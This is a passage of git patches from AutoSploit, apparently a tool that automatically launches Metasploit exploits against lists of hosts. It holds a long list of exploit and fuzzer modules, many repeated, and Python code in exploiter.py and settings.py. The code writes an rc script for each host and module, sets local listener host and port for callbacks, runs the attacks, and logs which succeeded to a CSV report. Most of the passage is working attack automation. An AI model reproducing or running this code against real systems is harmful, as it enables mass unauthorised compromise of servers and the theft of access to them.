"exploit/multi/http/werkzeug_debug_rce;exploit", - "exploit/multi/http/zemra_panel_rce;exploit", - "exploit/multi/http/zpanel_information_disclosure_rce;exploit", - "exploit/multi/http/joomla_http_header_rce;exploit", - "exploit/unix/webapp/joomla_akeeba_unserialize;exploit", - "exploit/unix/webapp/joomla_comjce_imgmanager;exploit", - "exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit", - "exploit/unix/webapp/joomla_media_upload_exec;exploit", - "exploit/multi/http/builderengine_upload_exec;exploit", - "exploit/multi/http/caidao_php_backdoor_exec;exploit", - "exploit/multi/http/atutor_sqli;exploit ", - "exploit/multi/http/ajaxplorer_checkinstall_exec;exploit", - "exploit/multi/http/apache_activemq_upload_jsp;exploit -", - "exploit/unix/webapp/wp_lastpost_exec;exploit -", - "exploit/unix/webapp/wp_mobile_detector_upload_execute;exploit", - "exploit/multi/http/axis2_deployer;exploit", - "exploit/unix/webapp/wp_foxypress_upload;exploit", - "exploit/linux/http/tr064_ntpserver_cmdinject;exploit", - "exploit/linux/misc/quest_pmmasterd_bof;exploit", - "exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload;exploit", - "exploit/unix/webapp/php_xmlrpc_eval;exploit", - "exploit/unix/webapp/wp_admin_shell_upload;exploit", - "exploit/linux/http/sophos_wpa_sblistpack_exec;exploit", - "exploit/linux/local/sophos_wpa_clear_keys;exploit", - "exploit/multi/http/zpanel_information_disclosure_rce;exploit", - "auxiliary/admin/cisco/cisco_asa_extrabacon;exploit", - "auxiliary/admin/cisco/cisco_secure_acs_bypass;exploit", - "auxiliary/admin/cisco/vpn_3000_ftp_bypass;exploit", - "exploit/bsdi/softcart/mercantec_softcart;exploit ", - "exploit/freebsd/misc/citrix_netscaler_soap_bof;exploit", - "exploit/freebsd/samba/trans2open;exploit", - "exploit/linux/ftp/proftp_sreplace;exploit ", - "exploit/linux/http/dcos_marathon;exploit", - "exploit/linux/http/f5_icall_cmd;exploit", - "exploit/linux/http/fritzbox_echo_exec;exploit", - "exploit/linux/http/gitlist_exec;exploit", - "exploit/linux/http/goautodial_3_rce_command_injection;exploit", - "exploit/linux/http/ipfire_bashbug_exec;exploit", - "exploit/linux/http/ipfire_oinkcode_exec;exploit", - "exploit/linux/http/ipfire_proxy_exec;exploit", - "exploit/linux/http/kaltura_unserialize_rce;exploit", - "exploit/linux/http/lifesize_uvc_ping_rce;exploit", - "exploit/linux/http/nagios_xi_chained_rce;exploit", - "exploit/linux/http/netgear_dgn1000_setup_unauth_exec;exploit", - "exploit/linux/http/netgear_wnr2000_rce ;exploit", - "exploit/linux/http/nuuo_nvrmini_auth_rce;exploit", - "exploit/linux/http/nuuo_nvrmini_unauth_rce;exploit", - "exploit/linux/http/op5_config_exec;exploit", - "exploit/linux/http/pandora_fms_exec;exploit", - "exploit/linux/http/pineapple_preconfig_cmdinject;exploit", - "exploit/linux/http/seagate_nas_php_exec_noauth;exploit", - "exploit/linux/http/symantec_messaging_gateway_exec;exploit", - "exploit/linux/http/trendmicro_imsva_widget_exec;exploit", - "exploit/linux/http/trueonline_billion_5200w_rce;exploit", - "exploit/linux/http/trueonline_p660hn_v1_rce;exploit", - "exploit/linux/http/trueonline_p660hn_v2_rce;exploit", - "exploit/linux/http/vcms_upload;exploit", - "exploit/linux/misc/lprng_format_string;exploit", - "exploit/linux/misc/mongod_native_helper;exploit", - "exploit/linux/misc/ueb9_bpserverd;exploit", - "exploit/linux/mysql/mysql_yassl_getname;exploit", - "exploit/linux/pop3/cyrus_pop3d_popsubfolders;exploit", - "exploit/linux/postgres/postgres_payload;exploit", - "exploit/linux/pptp/poptop_negative_read;exploit", - "exploit/linux/proxy/squid_ntlm_authenticate;exploit", - "exploit/linux/samba/lsa_transnames_heap;exploit", - "exploit/linux/samba/setinfopolicy_heap;exploit", - "exploit/linux/samba/trans2open;exploit", - "exploit/multi/elasticsearch/script_mvel_rce;exploit", - "exploit/multi/elasticsearch/search_groovy_script;exploit", - "exploit/multi/http/atutor_sqli;exploit", - "exploit/multi/http/axis2_deployer;exploit", - "exploit/multi/http/familycms_less_exe;exploit", - "exploit/multi/http/freenas_exec_raw;exploit", - "exploit/multi/http/gestioip_exec;exploit", - "exploit/multi/http/glassfish_deployer;exploit", - "exploit/multi/http/glpi_install_rce;exploit", - "exploit/multi/http/joomla_http_header_rce;exploit ", - "exploit/multi/http/makoserver_cmd_exec;exploit", - "exploit/multi/http/novell_servicedesk_rc;exploit", - "exploit/multi/http/oracle_reports_rce;exploit", - "exploit/multi/http/php_utility_belt_rce;exploit", - "exploit/multi/http/phpfilemanager_rce;exploit", - "exploit/multi/http/phpmyadmin_3522_backdoor;exploit", - "exploit/multi/http/phpwiki_ploticus_exec;exploit", - "exploit/multi/http/processmaker_exec;exploit", - "exploit/multi/http/rails_actionpack_inline_exec;exploit", - "exploit/multi/http/rails_dynamic_render_code_exec;exploit", - "exploit/multi/http/rails_secret_deserialization;exploit", - "exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit", - "exploit/multi/http/simple_backdoors_exec;exploit", - "exploit/multi/http/spree_search_exec;exploit", - "exploit/multi/http/spree_searchlogic_exec;exploit", - "exploit/multi/http/struts2_rest_xstream;exploit", - "exploit/multi/http/struts_code_exec;exploit", - "exploit/multi/http/struts_code_exec_classloader;exploit", - "exploit/multi/http/struts_code_exec_parameters;exploit", - "exploit/multi/http/struts_dev_mode;exploit", - "exploit/multi/http/sysaid_auth_file_upload;exploit", - "exploit/multi/http/tomcat_jsp_upload_bypass;exploit", - "exploit/multi/http/vtiger_install_rce;exploit", - "exploit/multi/http/werkzeug_debug_rce;exploit", - "exploit/multi/http/zemra_panel_rce;exploit", - "exploit/multi/http/zpanel_information_disclosure_rce;exploit", - "exploit/multi/ids/snort_dce_rpc;exploit", - "exploit/multi/misc/batik_svg_java;exploit", - "exploit/multi/misc/pbot_exec;exploit", - "exploit/multi/misc/veritas_netbackup_cmdexec;exploit", - "exploit/multi/mysql/mysql_udf_payload;exploit", - "exploit/multi/php/php_unserialize_zval_cookie;exploit", - "exploit/unix/http/freepbx_callmenum;exploit", - "exploit/unix/http/lifesize_room;exploit", - "exploit/unix/http/pfsense_clickjacking;exploit", - "exploit/unix/http/pfsense_group_member_exec;exploit", - "exploit/unix/http/tnftp_savefile;exploit", - "exploit/unix/misc/polycom_hdx_traceroute_exec;exploit", - "exploit/unix/webapp/awstats_migrate_exec;exploit", - "exploit/unix/webapp/carberp_backdoor_exec;exploit", - "exploit/unix/webapp/citrix_access_gateway_exec;exploit", - "exploit/unix/webapp/dogfood_spell_exec;exploit", - "exploit/unix/webapp/invision_pboard_unserialize_exec;exploit", - "exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit", - "exploit/unix/webapp/mybb_backdoor;exploit", - "exploit/unix/webapp/opensis_modname_exec;exploit", - "exploit/unix/webapp/oscommerce_filemanager;exploit", - "exploit/unix/webapp/piwik_superuser_plugin_upload;exploit", - "exploit/unix/webapp/tikiwiki_upload_exec;exploit", - "exploit/unix/webapp/webtester_exec;exploit", - "exploit/unix/webapp/wp_phpmailer_host_header;exploit", - "exploit/unix/webapp/wp_total_cache_exec;exploit", - "exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit", - "exploit/windows/http/ektron_xslt_exec;exploit", - "exploit/windows/http/ektron_xslt_exec_ws;exploit", - "exploit/windows/http/geutebrueck_gcore_x64_rce_bo;exploit", - "exploit/windows/http/hp_autopass_license_traversal;exploit", - "exploit/windows/http/manage_engine_opmanager_rce;exploit", - "exploit/windows/http/netgear_nms_rce;exploit", - "exploit/windows/http/sepm_auth_bypass_rce;exploit", - "exploit/windows/http/trendmicro_officescan_widget_exec;exploit", - "exploit/windows/iis/iis_webdav_upload_asp;exploit", - "exploit/windows/iis/msadc;exploit", - "exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit", - "exploit/windows/novell/file_reporter_fsfui_upload;exploit", - "exploit/windows/scada/ge_proficy_cimplicity_gefebt;exploit", - "exploit/windows/smb/ipass_pipe_exec;exploit", - "exploit/windows/smb/smb_relay;exploit", - "auxiliary/sqli/oracle/jvm_os_code_10g;exploit", - "auxiliary/sqli/oracle/jvm_os_code_11g;exploit", - "auxiliary/fuzzers/dns/dns_fuzzer;exploit", - "auxiliary/fuzzers/ftp/client_ftp;exploit", - "auxiliary/fuzzers/ftp/ftp_pre_post;exploit", - "auxiliary/fuzzers/http/http_form_field;exploit", - "auxiliary/fuzzers/http/http_get_uri_long;exploit", - "auxiliary/fuzzers/http/http_get_uri_strings;exploit", - "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer;exploit", - "auxiliary/fuzzers/smb/smb2_negotiate_corrupt;exploit", - "auxiliary/fuzzers/smb/smb_create_pipe;exploit", - "auxiliary/fuzzers/smb/smb_create_pipe_corrupt;exploit", - "auxiliary/fuzzers/smb/smb_negotiate_corrupt;exploit ", - "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt;exploit", - "auxiliary/fuzzers/smb/smb_tree_connect;exploit", - "auxiliary/fuzzers/smb/smb_tree_connect_corrupt;exploit", - "auxiliary/fuzzers/smtp/smtp_fuzzer;exploit", - "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt;exploit", - "auxiliary/fuzzers/ssh/ssh_version_15;exploit", - "auxiliary/fuzzers/ssh/ssh_version_2;exploit", - "auxiliary/fuzzers/ssh/ssh_version_corrupt;exploit", - "auxiliary/fuzzers/tds/tds_login_corrupt;exploit", - "auxiliary/fuzzers/tds/tds_login_username;exploit" + "exploit/windows/ftp/ms09_053_ftpd_nlst", + "exploit/windows/firewall/blackice_pam_icq", + "exploit/windows/http/amlibweb_webquerydll_app", + "exploit/windows/http/ektron_xslt_exec_ws", + "exploit/windows/http/umbraco_upload_aspx", + "exploit/windows/iis/iis_webdav_scstoragepathfromurl", + "exploit/windows/iis/iis_webdav_upload_asp", + "exploit/windows/iis/ms01_023_printer", + "exploit/windows/iis/ms01_026_dbldecode", + "exploit/windows/iis/ms01_033_idq", + "exploit/windows/iis/ms02_018_htr", + "exploit/windows/iis/ms02_065_msadc", + "exploit/windows/iis/ms03_007_ntdll_webdav", + "exploit/windows/iis/msadc", + "exploit/windows/isapi/ms00_094_pbserver", + "exploit/windows/isapi/ms03_022_nsiislog_post", + "exploit/windows/isapi/ms03_051_fp30reg_chunked", + "exploit/windows/isapi/rsa_webagent_redirect", + "exploit/windows/isapi/w3who_query", + "exploit/windows/scada/advantech_webaccess_dashboard_file_upload", + "exploit/windows/ssl/ms04_011_pct", + "exploit/freebsd/http/watchguard_cmd_exec ", + "exploit/linux/http/alienvault_exec ", + "exploit/linux/http/alienvault_sqli_exec ", + "exploit/linux/http/astium_sqli_upload ", + "exploit/linux/http/centreon_sqli_exec ", + "exploit/linux/http/centreon_useralias_exec ", + "exploit/linux/http/crypttech_cryptolog_login_exec ", + "exploit/linux/http/dolibarr_cmd_exec ", + "exploit/linux/http/goautodial_3_rce_command_injection", + "exploit/linux/http/kloxo_sqli ", + "exploit/linux/http/nagios_xi_chained_rce ", + "exploit/linux/http/netgear_wnr2000_rce ", + "exploit/linux/http/pandora_fms_sqli ", + "exploit/linux/http/riverbed_netprofiler_netexpress_exe ", + "exploit/linux/http/wd_mycloud_multiupload_upload ", + "exploit/linux/http/zabbix_sqli ", + "exploit/linux/misc/qnap_transcode_server ", + "exploit/linux/mysql/mysql_yassl_getname ", + "exploit/linux/mysql/mysql_yassl_hello ", + "exploit/linux/postgres/postgres_payload ", + "exploit/linux/samba/is_known_pipename ", + "exploit/multi/browser/java_jre17_driver_manager ", + "exploit/multi/http/atutor_sqli ", + "exploit/multi/http/dexter_casinoloader_exec ", + "exploit/multi/http/drupal_drupageddon ", + "exploit/multi/http/manage_engine_dc_pmp_sqli ", + "exploit/multi/http/manageengine_search_sqli ", + "exploit/multi/http/movabletype_upgrade_exec ", + "exploit/multi/http/php_volunteer_upload_exe ", + "exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli ", + "exploit/multi/http/splunk_mappy_exec ", + "exploit/multi/http/testlink_upload_exec ", + "exploit/multi/http/zpanel_information_disclosure_rce ", + "exploit/multi/misc/legend_bot_exec ", + "exploit/multi/mysql/mysql_udf_payload ", + "exploit/multi/postgres/postgres_createlang ", + "exploit/solaris/sunrpc/ypupdated_exec ", + "exploit/unix/ftp/proftpd_133c_backdoor ", + "exploit/unix/http/tnftp_savefile ", + "exploit/unix/webapp/joomla_contenthistory_sqli_rce ", + "exploit/unix/webapp/kimai_sqli ", + "exploit/unix/webapp/openemr_sqli_privesc_upload ", + "exploit/unix/webapp/seportal_sqli_exec ", + "exploit/unix/webapp/vbulletin_vote_sqli_exec ", + "exploit/unix/webapp/vicidial_manager_send_cmd_exec", + "exploit/windows/antivirus/symantec_endpoint_manager_rce ", + "exploit/windows/http/apache_mod_rewrite_ldap ", + "exploit/windows/http/ca_totaldefense_regeneratereports", + "exploit/windows/http/cyclope_ess_sqli", + "exploit/windows/http/hp_mpa_job_acct", + "exploit/windows/http/solarwinds_storage_manager_sql", + "exploit/windows/http/sonicwall_scrutinizer_sql", + "exploit/windows/misc/altiris_ds_sqli ", + "exploit/windows/misc/fb_cnct_group ", + "exploit/windows/misc/lianja_db_net ", + "exploit/windows/misc/manageengine_eventlog_analyzer_rce ", + "exploit/windows/mssql/lyris_listmanager_weak_pass ", + "exploit/windows/mssql/ms02_039_slammer ", + "exploit/windows/mssql/ms09_004_sp_replwritetovarbin ", + "exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli ", + "exploit/windows/mssql/mssql_linkcrawler ", + "exploit/windows/mssql/mssql_payload ", + "exploit/windows/mssql/mssql_payload_sqli ", + "exploit/windows/mysql/mysql_mof ", + "exploit/windows/mysql/mysql_start_up ", + "exploit/windows/mysql/mysql_yassl_hello", + "exploit/windows/mysql/scrutinizer_upload_exec ", + "exploit/windows/postgres/postgres_payload ", + "exploit/windows/scada/realwin_on_fcs_login", + "exploit/multi/http/rails_actionpack_inline_exec", + "exploit/multi/http/rails_dynamic_render_code_exec", + "exploit/multi/http/rails_json_yaml_code_exec", + "exploit/multi/http/rails_secret_deserialization", + "exploit/multi/http/rails_web_console_v2_code_exec", + "exploit/multi/http/rails_xml_yaml_code_exec", + "exploit/multi/http/rocket_servergraph_file_requestor_rce", + "exploit/multi/http/phpmoadmin_exec", + "exploit/multi/http/phpmyadmin_3522_backdoor", + "exploit/multi/http/phpmyadmin_preg_replace", + "exploit/multi/http/phpscheduleit_start_date", + "exploit/multi/http/phptax_exec", + "exploit/multi/http/phpwiki_ploticus_exec", + "exploit/multi/http/plone_popen2", + "exploit/multi/http/pmwiki_pagelist", + "exploit/multi/http/joomla_http_header_rce", + "exploit/multi/http/novell_servicedesk_rce", + "exploit/multi/http/oracle_reports_rce", + "exploit/multi/http/php_utility_belt_rce", + "exploit/multi/http/phpfilemanager_rce", + "exploit/multi/http/processmaker_exec", + "exploit/multi/http/rocket_servergraph_file_requestor_rce", + "exploit/multi/http/spree_search_exec", + "exploit/multi/http/spree_searchlogic_exec", + "exploit/multi/http/struts_code_exec_parameters", + "exploit/multi/http/vtiger_install_rce", + "exploit/multi/http/werkzeug_debug_rce", + "exploit/multi/http/zemra_panel_rce", + "exploit/multi/http/zpanel_information_disclosure_rce", + "exploit/multi/http/joomla_http_header_rce", + "exploit/unix/webapp/joomla_akeeba_unserialize", + "exploit/unix/webapp/joomla_comjce_imgmanager", + "exploit/unix/webapp/joomla_contenthistory_sqli_rce", + "exploit/unix/webapp/joomla_media_upload_exec", + "exploit/multi/http/builderengine_upload_exec", + "exploit/multi/http/caidao_php_backdoor_exec", + "exploit/multi/http/atutor_sqli ", + "exploit/multi/http/ajaxplorer_checkinstall_exec", + "exploit/multi/http/apache_activemq_upload_jsp", + "exploit/unix/webapp/wp_lastpost_exec", + "exploit/unix/webapp/wp_mobile_detector_upload_execute", + "exploit/multi/http/axis2_deployer", + "exploit/unix/webapp/wp_foxypress_upload", + "exploit/linux/http/tr064_ntpserver_cmdinject", + "exploit/linux/misc/quest_pmmasterd_bof", + "exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload", + "exploit/unix/webapp/php_xmlrpc_eval", + "exploit/unix/webapp/wp_admin_shell_upload", + "exploit/linux/http/sophos_wpa_sblistpack_exec", + "exploit/linux/local/sophos_wpa_clear_keys", + "exploit/multi/http/zpanel_information_disclosure_rce", + "auxiliary/admin/cisco/cisco_asa_extrabacon", + "auxiliary/admin/cisco/cisco_secure_acs_bypass", + "auxiliary/admin/cisco/vpn_3000_ftp_bypass", + "exploit/bsdi/softcart/mercantec_softcart ", + "exploit/freebsd/misc/citrix_netscaler_soap_bof", + "exploit/freebsd/samba/trans2open", + "exploit/linux/ftp/proftp_sreplace ", + "exploit/linux/http/dcos_marathon", + "exploit/linux/http/f5_icall_cmd", + "exploit/linux/http/fritzbox_echo_exec", + "exploit/linux/http/gitlist_exec", + "exploit/linux/http/goautodial_3_rce_command_injection", + "exploit/linux/http/ipfire_bashbug_exec", + "exploit/linux/http/ipfire_oinkcode_exec", + "exploit/linux/http/ipfire_proxy_exec", + "exploit/linux/http/kaltura_unserialize_rce", + "exploit/linux/http/lifesize_uvc_ping_rce", + "exploit/linux/http/nagios_xi_chained_rce", + "exploit/linux/http/netgear_dgn1000_setup_unauth_exec", + "exploit/linux/http/netgear_wnr2000_rce ", + "exploit/linux/http/nuuo_nvrmini_auth_rce", + "exploit/linux/http/nuuo_nvrmini_unauth_rce", + "exploit/linux/http/op5_config_exec", + "exploit/linux/http/pandora_fms_exec", + "exploit/linux/http/pineapple_preconfig_cmdinject", + "exploit/linux/http/seagate_nas_php_exec_noauth", + "exploit/linux/http/symantec_messaging_gateway_exec", + "exploit/linux/http/trendmicro_imsva_widget_exec", + "exploit/linux/http/trueonline_billion_5200w_rce", + "exploit/linux/http/trueonline_p660hn_v1_rce", + "exploit/linux/http/trueonline_p660hn_v2_rce", + "exploit/linux/http/vcms_upload", + "exploit/linux/misc/lprng_format_string", + "exploit/linux/misc/mongod_native_helper", + "exploit/linux/misc/ueb9_bpserverd", + "exploit/linux/mysql/mysql_yassl_getname", + "exploit/linux/pop3/cyrus_pop3d_popsubfolders", + "exploit/linux/postgres/postgres_payload", + "exploit/linux/pptp/poptop_negative_read", + "exploit/linux/proxy/squid_ntlm_authenticate", + "exploit/linux/samba/lsa_transnames_heap", + "exploit/linux/samba/setinfopolicy_heap", + "exploit/linux/samba/trans2open", + "exploit/multi/elasticsearch/script_mvel_rce", + "exploit/multi/elasticsearch/search_groovy_script", + "exploit/multi/http/atutor_sqli", + "exploit/multi/http/axis2_deployer", + "exploit/multi/http/familycms_less_exe", + "exploit/multi/http/freenas_exec_raw", + "exploit/multi/http/gestioip_exec", + "exploit/multi/http/glassfish_deployer", + "exploit/multi/http/glpi_install_rce", + "exploit/multi/http/joomla_http_header_rce ", + "exploit/multi/http/makoserver_cmd_exec", + "exploit/multi/http/novell_servicedesk_rc", + "exploit/multi/http/oracle_reports_rce", + "exploit/multi/http/php_utility_belt_rce", + "exploit/multi/http/phpfilemanager_rce", + "exploit/multi/http/phpmyadmin_3522_backdoor", + "exploit/multi/http/phpwiki_ploticus_exec", + "exploit/multi/http/processmaker_exec", + "exploit/multi/http/rails_actionpack_inline_exec", + "exploit/multi/http/rails_dynamic_render_code_exec", + "exploit/multi/http/rails_secret_deserialization", + "exploit/multi/http/rocket_servergraph_file_requestor_rce", + "exploit/multi/http/simple_backdoors_exec", + "exploit/multi/http/spree_search_exec", + "exploit/multi/http/spree_searchlogic_exec", + "exploit/multi/http/struts2_rest_xstream", + "exploit/multi/http/struts_code_exec", + "exploit/multi/http/struts_code_exec_classloader", + "exploit/multi/http/struts_code_exec_parameters", + "exploit/multi/http/struts_dev_mode", + "exploit/multi/http/sysaid_auth_file_upload", + "exploit/multi/http/tomcat_jsp_upload_bypass", + "exploit/multi/http/vtiger_install_rce", + "exploit/multi/http/werkzeug_debug_rce", + "exploit/multi/http/zemra_panel_rce", + "exploit/multi/http/zpanel_information_disclosure_rce", + "exploit/multi/ids/snort_dce_rpc", + "exploit/multi/misc/batik_svg_java", + "exploit/multi/misc/pbot_exec", + "exploit/multi/misc/veritas_netbackup_cmdexec", + "exploit/multi/mysql/mysql_udf_payload", + "exploit/multi/php/php_unserialize_zval_cookie", + "exploit/unix/http/freepbx_callmenum", + "exploit/unix/http/lifesize_room", + "exploit/unix/http/pfsense_clickjacking", + "exploit/unix/http/pfsense_group_member_exec", + "exploit/unix/http/tnftp_savefile", + "exploit/unix/misc/polycom_hdx_traceroute_exec", + "exploit/unix/webapp/awstats_migrate_exec", + "exploit/unix/webapp/carberp_backdoor_exec", + "exploit/unix/webapp/citrix_access_gateway_exec", + "exploit/unix/webapp/dogfood_spell_exec", + "exploit/unix/webapp/invision_pboard_unserialize_exec", + "exploit/unix/webapp/joomla_contenthistory_sqli_rce", + "exploit/unix/webapp/mybb_backdoor", + "exploit/unix/webapp/opensis_modname_exec", + "exploit/unix/webapp/oscommerce_filemanager", + "exploit/unix/webapp/piwik_superuser_plugin_upload", + "exploit/unix/webapp/tikiwiki_upload_exec", + "exploit/unix/webapp/webtester_exec", + "exploit/unix/webapp/wp_phpmailer_host_header", + "exploit/unix/webapp/wp_total_cache_exec", + "exploit/windows/antivirus/symantec_endpoint_manager_rce", + "exploit/windows/http/ektron_xslt_exec", + "exploit/windows/http/ektron_xslt_exec_ws", + "exploit/windows/http/geutebrueck_gcore_x64_rce_bo", + "exploit/windows/http/hp_autopass_license_traversal", + "exploit/windows/http/manage_engine_opmanager_rce", + "exploit/windows/http/netgear_nms_rce", + "exploit/windows/http/sepm_auth_bypass_rce", + "exploit/windows/http/trendmicro_officescan_widget_exec", + "exploit/windows/iis/iis_webdav_upload_asp", + "exploit/windows/iis/msadc", + "exploit/windows/misc/manageengine_eventlog_analyzer_rce", + "exploit/windows/novell/file_reporter_fsfui_upload", + "exploit/windows/scada/ge_proficy_cimplicity_gefebt", + "exploit/windows/smb/ipass_pipe_exec", + "exploit/windows/smb/smb_relay", + "auxiliary/sqli/oracle/jvm_os_code_10g", + "auxiliary/sqli/oracle/jvm_os_code_11g", + "auxiliary/fuzzers/dns/dns_fuzzer", + "auxiliary/fuzzers/ftp/client_ftp", + "auxiliary/fuzzers/ftp/ftp_pre_post", + "auxiliary/fuzzers/http/http_form_field", + "auxiliary/fuzzers/http/http_get_uri_long", + "auxiliary/fuzzers/http/http_get_uri_strings", + "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer", + "auxiliary/fuzzers/smb/smb2_negotiate_corrupt", + "auxiliary/fuzzers/smb/smb_create_pipe", + "auxiliary/fuzzers/smb/smb_create_pipe_corrupt", + "auxiliary/fuzzers/smb/smb_negotiate_corrupt ", + "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt", + "auxiliary/fuzzers/smb/smb_tree_connect", + "auxiliary/fuzzers/smb/smb_tree_connect_corrupt", + "auxiliary/fuzzers/smtp/smtp_fuzzer", + "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt", + "auxiliary/fuzzers/ssh/ssh_version_15", + "auxiliary/fuzzers/ssh/ssh_version_2", + "auxiliary/fuzzers/ssh/ssh_version_corrupt", + "auxiliary/fuzzers/tds/tds_login_corrupt", + "auxiliary/fuzzers/tds/tds_login_username" ] } diff --git a/lib/exploitation/exploiter.py b/lib/exploitation/exploiter.py index 3525e5f..7836e92 100644 --- a/lib/exploitation/exploiter.py +++ b/lib/exploitation/exploiter.py @@ -1,6 +1,16 @@ +import datetime +import csv +import re +from os import ( + makedirs, + path, + linesep +) + import lib.settings import lib.output + def whitelist_wash(hosts, whitelist_file): """ remove IPs from hosts list that do not appear in WHITELIST_FILE @@ -55,22 +65,95 @@ def start_exploit(self): start the exploit, there is still no rollover but it's being worked """ # TODO:/ fix the rollover issue here - template = ( - "sudo {} {} -x 'workspace -a {}; " - "setg LHOST {}; setg LPORT {}; setg VERBOSE " - "true; setg THREADS 100; set RHOST {}; set RHOSTS {}; use {} -j;'" - ) + + today_printable = datetime.datetime.today().strftime("%Y-%m-%d_%Hh%Mm%Ss") + current_run_path = path.join(lib.settings.RC_SCRIPTS_PATH, today_printable) + makedirs(current_run_path) + + report_path = path.join(current_run_path, "report.csv") + with open(report_path, 'w') as f: + csv_file = csv.writer(f, quoting=csv.QUOTE_ALL) + csv_file.writerow(['Target Host', + 'Date (UTC)', + 'MSF Module', + "LocalHost", + "Listening Port", + "Successful Logs", + "Failure Logs", + "All Logs"]) + for host in self.hosts: + current_host_path = path.join(current_run_path, host.strip()) + makedirs(current_host_path) + for mod in self.mods: lib.output.info( "launching exploit '{}' against host '{}'".format( mod.strip(), host.strip() ) ) - template = template.format( - "ruby" if self.ruby_exec else "", - self.msf_path if self.msf_path is not None else "msfconsole", - self.configuration[0], self.configuration[1], self.configuration[2], - host.strip(), host.strip(), mod.strip() + cmd_template = ( + "sudo {use_ruby} {msf_path} -r {rc_script_path} -q" + ) + + use_ruby = "ruby" if self.ruby_exec else "" + msf_path = self.msf_path if self.msf_path is not None else "msfconsole" + + + + # What's the point of having a workspace if you overwrite it every fucking time.. + rc_script_template = ( + "workspace -a {workspace}\n" + "use {module_name}\n" + "setg lhost {lhost}\n" + "setg lport {lport}\n" + "setg verbose true\n" + "setg threads 20\n" + "set rhost {rhost}\n" + "set rhosts {rhosts}\n" + "run\n" + "exit\n" ) - lib.settings.cmdline(template) + + module_name=mod.strip() + workspace=self.configuration[0] + lhost=self.configuration[1] + lport=self.configuration[2] + rhost=host.strip() + + current_rc_script_path = path.join(current_host_path, mod.replace("/", '-').strip()) + with open(current_rc_script_path, 'w') as f: + + f.writelines(rc_script_template.format( + module_name=module_name, + workspace=workspace, + lhost=lhost, + lport=lport, + rhost=rhost, + rhosts=rhost + )) + + with open(report_path, 'a') as f: + + cmd = cmd_template.format( + use_ruby=use_ruby, + msf_path=msf_path, + rc_script_path=current_rc_script_path + ) + + output = lib.settings.cmdline(cmd) + + ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]') + msf_output_lines = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[.\]', x)]) + msf_wins = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[\+\]', x)]) + msf_fails = linesep.join([ansi_escape.sub('', x) for x in output if re.search('\[-\]', x)]) + + csv_file = csv.writer(f, quoting=csv.QUOTE_ALL) + csv_file.writerow([rhost, + today_printable, + module_name, + lhost, + lport, + msf_wins, + msf_fails, + msf_output_lines]) diff --git a/lib/settings.py b/lib/settings.py index a6a91fd..2baac3a 100644 --- a/lib/settings.py +++ b/lib/settings.py @@ -7,7 +7,10 @@ import getpass import tempfile import distutils.spawn -# import subprocess +from subprocess import ( + PIPE, + Popen +) import psutil @@ -28,6 +31,8 @@ # one bash script to rule them all takes an argument via the operating system START_SERVICES_PATH = "{}/etc/scripts/start_services.sh".format(CUR_DIR) +RC_SCRIPTS_PATH = "{}/autosploit_out/".format(CUR_DIR) + # path to the file that will contain our query QUERY_FILE_PATH = tempfile.NamedTemporaryFile(delete=False).name @@ -166,14 +171,19 @@ def cmdline(command): I intend to have the issue resolved by Version 1.5.0. """ - os.system(command) - '''process = subprocess.call( - args=" ".join(command), - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - shell=True - ) - return process''' + #os.system(command) + lib.output.info("Executing command '{}'".format(command.strip())) + split_cmd = [x.strip() for x in command.split(" ") if x] + + sys.stdout.flush() + + proc = Popen(split_cmd, stdout=PIPE, bufsize=1) + stdout_buff = [] + for stdout_line in iter(proc.stdout.readline, b''): + stdout_buff += [stdout_line.rstrip()] + print("(msf)>> {}".format(stdout_line).rstrip()) + + return stdout_buff def check_for_msf(): From 68b354acefacd440cb461a3c9bfa0a609f144918 Mon Sep 17 00:00:00 2001 From: Christian B Date: Tue, 3 Apr 2018 20:01:25 +0200 Subject: [PATCH 27/31] added execute permission to start_services (#118) --- etc/scripts/start_services.sh | 0 1 file changed, 0 insertions(+), 0 deletions(-) mode change 100644 => 100755 etc/scripts/start_services.sh diff --git a/etc/scripts/start_services.sh b/etc/scripts/start_services.sh old mode 100644 new mode 100755 From f0880ac25fd645c63f7948f0b9e5735eef175c46 Mon Sep 17 00:00:00 2001 From: Ekultek Date: Tue, 3 Apr 2018 14:53:55 -0500 Subject: [PATCH 28/31] bumping version number --- lib/banner.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/banner.py b/lib/banner.py index 6f14683..4e33e4d 100644 --- a/lib/banner.py +++ b/lib/banner.py @@ -1,7 +1,7 @@ import os import random -VERSION = "2.0" +VERSION = "2.1" def banner_1(line_sep="#--", space=" " * 30): From 2240493f154d54e896eb1f6f90c097b1583d8c96 Mon Sep 17 00:00:00 2001 From: ekultek Date: Tue, 3 Apr 2018 15:09:09 -0500 Subject: [PATCH 29/31] minor updates for prep branch --- README.md | 4 +++- lib/cmdline/cmd.py | 2 +- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index cf758ea..1e35ae6 100644 --- a/README.md +++ b/README.md @@ -72,7 +72,7 @@ As of version 2.0 AutoSploit can be started with a number of command line argume ``` usage: python autosploit.py -[c|z|s|a] -[q] QUERY - [-C] WORKSPACE LHOST LPORT [-e] + [-C] WORKSPACE LHOST LPORT [-e] [--whitewash] PATH [--ruby-exec] [--msf-path] PATH [-E] EXPLOIT-FILE-PATH [--rand-agent] [--proxy] PROTO://IP:PORT [-P] AGENT @@ -116,6 +116,7 @@ misc arguments: this --msf-path MSF-PATH pass the path to your framework if it is not in your ENV PATH + --whitelist PATH only exploit hosts listed in the whitelist file ``` ## Installation @@ -128,6 +129,7 